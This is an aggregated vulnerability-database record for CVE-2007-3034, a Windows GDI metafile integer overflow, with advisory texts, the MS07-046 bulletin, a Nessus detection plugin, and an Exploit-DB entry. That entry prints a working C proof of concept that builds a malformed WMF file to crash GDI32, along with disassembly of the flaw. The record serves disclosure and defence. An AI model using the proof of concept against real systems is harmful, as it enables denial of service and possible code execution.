ID CVE-2007-3034 Type cve Reporter cve@mitre.org Modified 2019-02-26T14:04:00
Description
Integer overflow in the AttemptWrite function in Graphics Rendering Engine (GDI) on Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted metafile (image) with a large record length value, which triggers a heap-based buffer overflow.
{"osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1018563\n[Secunia Advisory ID:26423](https://secuniaresearch.flexerasoftware.com/advisories/26423/)\nOVAL ID: 2088\nNews Article: http://www.computerworld.com/action/article.do?command=viewArticleBasic&taxonomyName=security&articleId=9030696\nMicrosoft Security Bulletin: MS07-046\nMicrosoft Knowledge Base Article: 938829\nFrSIRT Advisory: ADV-2007-2870\n[CVE-2007-3034](https://vulners.com/cve/CVE-2007-3034)\nCERT VU: 640136\nBugtraq ID: 25302\n", "modified": "2007-08-14T15:52:01", "published": "2007-08-14T15:52:01", "href": "https://vulners.com/osvdb/OSVDB:36388", "id": "OSVDB:36388", "title": "Microsoft Windows Graphics Rendering Engine (GDI) Metafile Image Handling Overflow", "type": "osvdb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T22:04:58", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 25302\r\nCVE(CAN) ID: CVE-2007-3034\r\n\r\nMicrosoft Windows\u662f\u5fae\u8f6f\u53d1\u5e03\u7684\u975e\u5e38\u6d41\u884c\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\r\n\r\nWindows\u7684\u56fe\u5f62\u8bbe\u5907\u63a5\u53e3\uff08GDI\uff09\u7684GDI32\u51fd\u6570AttemptWrite\u5904\u7406Windows\u5143\u6587\u4ef6\u65f6\u53ef\u80fd\u4f1a\u51fa\u73b0\u6574\u6570\u6ea2\u51fa\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u63d0\u5347\u81ea\u5df1\u7684\u6743\u9650\u3002\r\n\r\n\u5982\u4e0b\u53cd\u6c47\u7f16\u6240\u793a\uff0c\u5f88\u591aGDI32 API\u51fd\u6570\u90fd\u4f1a\u8c03\u7528AttemptWrite\uff0c\u5982CreateMetaFileW\u3002\r\n\r\n 77F4B519 mov esi, [ebp+0Ch] ; reported size of record in bytes\r\n ... ; (user-controlled)\r\n 77F4B548 mov eax, [ebx+0Ch] ; amount of buffer used in bytes\r\n ; (user-controlled)\r\n 77F4B548 lea ecx, [eax+esi] ; *** integer overflow ***\r\n 77F4B54E cmp ecx, [ebx+08h] ; buffer capacity\r\n 77F4B551 ja _no_memcpy\r\n ...\r\n 77F4B56D mov edi, [ebx] ; pointer to start of buffer\r\n 77F4B56F mov ecx, esi\r\n 77F4B574 add edi, eax ; now EDI points to unused buffer space\r\n ...\r\n 77F4B5BA mov eax, ecx\r\n 77F4B5BC shr ecx, 2\r\n 77F4B5BF rep movsd ; *** complete heap overwrite ***\r\n\r\n\u5982\u679c\u521b\u5efa\u4e86\u5305\u542b\u6709\u8d85\u5927\u8bb0\u5f55\u957f\u5ea6\u7684\u5143\u6587\u4ef6\u5c31\u4f1a\u89e6\u53d1\u5806\u6ea2\u51fa\uff0c\u56e0\u4e3amemcpy\u8bd5\u56fe\u5c06\u5927\u7ea64GB\u7684\u4efb\u610f\u6570\u636e\u62f7\u8d1d\u5230\u5806\u5757\u3002\u8fd9\u4e2a\u62f7\u8d1d\u5927\u5c0f\u4f1a\u5bfc\u81f4\u8bbf\u95ee\u7834\u574f\uff0c\u4f46\u5728\u53ef\u4ee5\u5904\u7406\u8fd9\u79cd\u5f02\u5e38\u7684\u7a0b\u5e8f\u4e2d\u4f1a\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\n\n\nMicrosoft Windows XP SP2\r\nMicrosoft Windows Server 2003 x64 Edition\r\nMicrosoft Windows Server 2003 SP1\r\nMicrosoft Windows 2000SP4\n Microsoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS07-046\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS07-046\uff1aVulnerability in GDI Could Allow Remote Code Execution (938829)\r\n\u94fe\u63a5\uff1a<a href=\"http://www.microsoft.com/technet/security/Bulletin/MS07-046.mspx?pf=true\" target=\"_blank\">http://www.microsoft.com/technet/security/Bulletin/MS07-046.mspx?pf=true</a>", "modified": "2007-08-17T00:00:00", "published": "2007-08-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-2122", "id": "SSV:2122", "type": "seebug", "title": "Microsoft Windows GDI AttemptWrite\u51fd\u6570\u8fdc\u7a0b\u5806\u6ea2\u51fa\u6f0f\u6d1e\uff08MS07-046\uff09", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:26", "bulletinFamily": "software", "description": "Heap buffer overflow on Windows metafiles parsing.", "modified": "2007-08-14T00:00:00", "published": "2007-08-14T00:00:00", "id": "SECURITYVULNS:VULN:8043", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8043", "title": "Microsoft Windows GDI code execution", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:23", "bulletinFamily": "software", "description": "Microsoft Security Bulletin MS07-046 - Critical\r\nVulnerability in GDI Could Allow Remote Code Execution (938829)\r\nPublished: August 14, 2007\r\n\r\nVersion: 1.0\r\nGeneral Information\r\nExecutive Summary\r\n\r\nThis critical security update resolves a privately reported vulnerability. A remote code execution vulnerability exists in the Graphics Rendering Engine in the way that it handles specially crafted images. An attacker could exploit the vulnerability by constructing a specially crafted image that could potentially allow remote code execution if a user opened a specially crafted attachment in e-mail. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\nThis is a critical security update for all supported editions of Windows except Windows 2003 Server Service Pack 2 and Windows Vista. For more information, see the subsection, Affected and Non-Affected Software, in this section.\r\n\r\nThis security update addresses the vulnerability by modifying the way that the Graphics Rendering Engine handles images. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.\r\n\r\nRecommendation: Microsoft recommends that customers apply the security update immediately.\r\n\r\nKnown Issues: None.\r\nTop of sectionTop of section\r\nAffected and Non-Affected Software\r\n\r\nThe software listed here have been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.\r\n\r\nAffected Software\r\nOperating System\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by This Update\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS06-001\r\n\r\nWindows XP Service Pack 2\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS06-001\r\n\r\nWindows XP Professional x64 Edition\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS06-001\r\n\r\nWindows Server 2003 Service Pack 1\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS06-001\r\n\r\nWindows Server 2003 x64 Edition\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS06-001\r\n\r\nWindows Server 2003 with SP1 for Itanium-based Systems\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS06-001\r\n\r\nNon-Affected Software\r\nOperating System\r\n\r\nWindows XP Professional x64 Edition Service Pack 2\r\n\r\nWindows Server 2003 Service Pack 2\r\n\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\r\nWindows Server 2003 with SP2 for Itanium-based Systems\r\n\r\nWindows Vista\r\n\r\nWindows Vista x64 Edition\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nI am using an older release of the software discussed in this security bulletin. What should I do? \r\nThe affected software listed in this bulletin have been tested to determine which releases are affected. Other releases are past their support life cycle. To determine the support life cycle for your software release, visit Microsoft Support Lifecycle.\r\n\r\nIt should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle. For more information about the extended security update support period for these software releases, visit the Microsoft Product Support Services Web site.\r\n\r\nCustomers who require custom support for older software must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\nTop of sectionTop of section\r\nVulnerability Information\r\n\t\r\nSeverity Ratings and Vulnerability Identifiers\r\nVulnerability Severity Rating and Maximum Security Impact by Affected Software\r\nAffected Software\tRemote Code Execution Vulnerability in GDI \u2013 CVE-2007-3034\tAggregate Severity Rating\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows XP Service Pack 2\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows XP Professional x64 Edition\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2003 Service Pack 1\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2003 x64 Edition\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2003 with SP1 for Itanium-based Systems\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nTop of sectionTop of section\r\n\t\r\nRemote Code Execution Vulnerability in GDI\u2013 CVE-2007-3034\r\n\r\nA remote code execution vulnerability exists in the Graphics Rendering Engine because of the way that it handles specially crafted images. An attacker could exploit the vulnerability by constructing a specially crafted image that could potentially allow remote code execution if a user opened a specially crafted attachment in e-mail.\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2007-3034.\r\n\t\r\nMitigating Factors for Remote Code Execution Vulnerability in GDI\u2013 CVE-2007-3034\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factor may be helpful in your situation:\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nMicrosoft Windows Vista and Windows Server 2003 Service pack 2 are unaffected by this issue.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Remote Code Execution Vulnerability in GDI\u2013 CVE-2007-3034\r\n\r\nMicrosoft has not identified any workarounds for this vulnerability.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Remote Code Execution Vulnerability in GDI\u2013 CVE-2007-3034\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nWhat causes the vulnerability \r\nThe vulnerability exists in the way that the Graphics Rendering Engine handles specially crafted images, potentially allowing arbitrary code to be executed.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could run code on the affected system.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could exploit this vulnerability by creating a specially crafted attachment in e-mail and then persuading the user to open the attachment. If the user opened the attachment, the attacker could cause arbitrary code to run in the security context of the locally logged-on user.\r\n\r\nWhat is GDI? \r\nMicrosoft Windows graphics device interface (GDI) enables applications to use graphics and formatted text on both the video display and the printer. Windows-based applications do not access the graphics hardware directly. Instead, GDI interacts with device drivers on behalf of applications. For more information on GDI, please visit the Windows GDI Start Page.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nWorkstations and terminal servers are primarily at risk.\r\n\r\nWhat does the update do? \r\nThe update removes the vulnerability by adding overflow validations to the handling of images.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through responsible disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nOther Information\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\neEye Digital Security for reporting the Remote Code Execution Vulnerability in GDI\u2013 CVE-2007-3034.\r\n\r\nSupport\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Microsoft Product Support Services at 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions\r\n\u2022\t\r\n\r\nV1.0 (August 14, 2007): Bulletin published.", "modified": "2007-08-14T00:00:00", "published": "2007-08-14T00:00:00", "id": "SECURITYVULNS:DOC:17789", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:17789", "title": "Microsoft Security Bulletin MS07-046 - Critical Vulnerability in GDI Could Allow Remote Code Execution (938829)", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T20:41:09", "bulletinFamily": "exploit", "description": "MS Windows (GDI32.DLL) Denial of Service Exploit (MS07-046). CVE-2007-3034. Dos exploit for windows platform", "modified": "2007-08-29T00:00:00", "published": "2007-08-29T00:00:00", "id": "EDB-ID:4337", "href": "https://www.exploit-db.com/exploits/4337/", "type": "exploitdb", "title": "Microsoft Windows - GDI32.DLL Denial of Service Exploit MS07-046", "sourceData": "/*\r\n * MS07-046(GDI32.dll Integer overflow DOS) Proof Of Concept Code\r\n \r\n * by Hong Gil-Dong & Chun Woo-Chi\r\n\r\n * Yang yeon(?~1542), Korea\r\n * \"I shall keep clenching my left fist unitl i see the real tao\".\r\n\r\n * This POC is only for test. If an application read a malformed wmf \r\n * file like this POC, the application will be crashed. If you apply \r\n * this code, you can execute an arbitrary code.\r\n *\r\n\r\n * We tested this code on Windows XP SP2 Korean Edition \r\n * (GDI32.dll version 5.1.2600.3099). But it will work well on other\r\n * systems.\r\n */\r\n\r\n#include <stdio.h>\r\n#include <windows.h>\r\n\r\n#define WMF_FILE \"ms07-046.wmf\"\r\n\r\nvoid usage(void);\r\n\r\nint main()\r\n{\r\n\t\r\n\tFILE *fp;\r\n\r\n\tchar wmf[] = \"\\x01\\x00\\x09\\x00\\x00\\x03\\x11\\x00\\x00\\x00\\x00\\x00\"\\\r\n \"\\x05\\x00\\x00\\x00\\x00\\x00\\xFF\\xFF\\xFF\\xFF\\x13\\x02\"\\\r\n \"\\x32\\x00\\x96\\x00\\x03\\x00\\x00\\x00\\x00\\x00\";\r\n\tint i;\r\n\t\r\n\tHMETAFILE srcMeta;\r\n\r\n usage();\r\n\r\n\tif ((fp = fopen(WMF_FILE, \"w\")) == NULL) {\r\n printf(\"File %s write error\\n\", WMF_FILE);\r\n return 0;\r\n\t}\r\n\r\n\tfor(i=0; i<sizeof(wmf)-1; i++)\r\n\t\tfputc(wmf[i], fp);\r\n\r\n\tfclose(fp);\r\n\r\n srcMeta = GetMetaFile(WMF_FILE);\r\n CopyMetaFile( srcMeta, NULL);\r\n\r\n return 0;\r\n}\r\n\r\nvoid usage(void) \r\n{\r\n printf(\"MS07-046 Windows Meta File RecordParms Integer Overflow \\n\");\r\n printf(\"Proof of Concept by Hong Gil-Dong & Chun Woo-Chi \\n\");\r\n \r\n}\r\n\r\n// milw0rm.com [2007-08-29]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/4337/"}], "cert": [{"lastseen": "2019-10-09T19:50:48", "bulletinFamily": "info", "description": "### Overview \n\nMicrosoft Windows GDI contains an integer overflow in the handling of Windows metafiles, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nMicrosoft Windows [GDI](<http://msdn2.microsoft.com/en-us/library/ms536795.aspx>) (Graphics Device Interface) enables applications to use graphics and formatted text on both video displays and printers. GDI can be used to handle bitmaps, metafiles, and fonts. Microsoft Windows GDI contains an integer overflow vulnerability in the `AttemptWrite()` function. This integer overflow leads to a heap overflow. \n \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted metafile, a remote, unauthenticated attacker may be able to execute arbitrary code with the privileges of the user. \n \n--- \n \n### Solution \n\n**Apply an update**\n\nThis vulnerability is addressed by Microsoft Security Bulletin [MS07-046](<http://www.microsoft.com/technet/security/Bulletin/MS07-046.mspx>). This bulletin provides an updated version of GDI. \n \n--- \n \n### Vendor Information\n\n640136\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Microsoft Corporation\n\nUpdated: August 14, 2007 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThis vulnerability is addressed by Microsoft Security Bulletin [MS07-046](<http://www.microsoft.com/technet/security/Bulletin/MS07-046.mspx>). This bulletin provides an updated version of GDI.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23640136 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.microsoft.com/technet/security/bulletin/ms07-046.mspx>\n * <http://research.eeye.com/html/advisories/published/AD20070814b.html>\n * <http://msdn2.microsoft.com/en-us/library/ms536795.aspx>\n * <http://secunia.com/advisories/26423/>\n\n### Acknowledgements\n\nThanks to Microsoft for reporting this vulnerability, who in turn credit eEye Digital Security.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-3034](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3034>) \n---|--- \n**Severity Metric:****** | 27.34 \n**Date Public:** | 2007-08-14 \n**Date First Published:** | 2007-08-14 \n**Date Last Updated: ** | 2007-08-14 20:58 UTC \n**Document Revision: ** | 6 \n", "modified": "2007-08-14T20:58:00", "published": "2007-08-14T00:00:00", "id": "VU:640136", "href": "https://www.kb.cert.org/vuls/id/640136", "type": "cert", "title": "Microsoft GDI Windows Metafile AttemptWrite integer overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-11-03T12:15:44", "bulletinFamily": "scanner", "description": "The remote host contains a version of Microsoft Windows that has\nseveral vulnerabilities in the Graphic Rendering Engine and in the way\nWindows handles Metafiles.\n\nAn attacker may exploit these flaws to execute arbitrary code on the\nremote host. To exploit this flaw, an attacker would need to send a\nspecially crafted image to a user on the remote host, or lure him into\nvisiting a rogue website containing such a file.", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS07-046.NASL", "href": "https://www.tenable.com/plugins/nessus/25884", "published": "2007-08-14T00:00:00", "title": "MS07-046: Vulnerability in GDI Could Allow Remote Code Execution (938829)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25884);\n script_version(\"1.30\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2007-3034\");\n script_bugtraq_id(25302);\n script_xref(name:\"MSFT\", value:\"MS07-046\");\n script_xref(name:\"MSKB\", value:\"938829\");\n \n script_xref(name:\"CERT\", value:\"640136\");\n\n script_name(english:\"MS07-046: Vulnerability in GDI Could Allow Remote Code Execution (938829)\");\n script_summary(english:\"Determines the presence of update 938829\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host by sending a\nmalformed file to a victim.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a version of Microsoft Windows that has\nseveral vulnerabilities in the Graphic Rendering Engine and in the way\nWindows handles Metafiles.\n\nAn attacker may exploit these flaws to execute arbitrary code on the\nremote host. To exploit this flaw, an attacker would need to send a\nspecially crafted image to a user on the remote host, or lure him into\nvisiting a rogue website containing such a file.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2007/ms07-046\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2000, XP, 2003 and\nVista.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS07-046';\nkb = '938829';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2k:'4,5', xp:'2', win2003:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n hotfix_is_vulnerable(os:\"5.2\", sp:1, file:\"gdi32.dll\", version:\"5.2.3790.2960\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, file:\"gdi32.dll\", version:\"5.1.2600.3159\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"gdi32.dll\", version:\"5.0.2195.7138\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
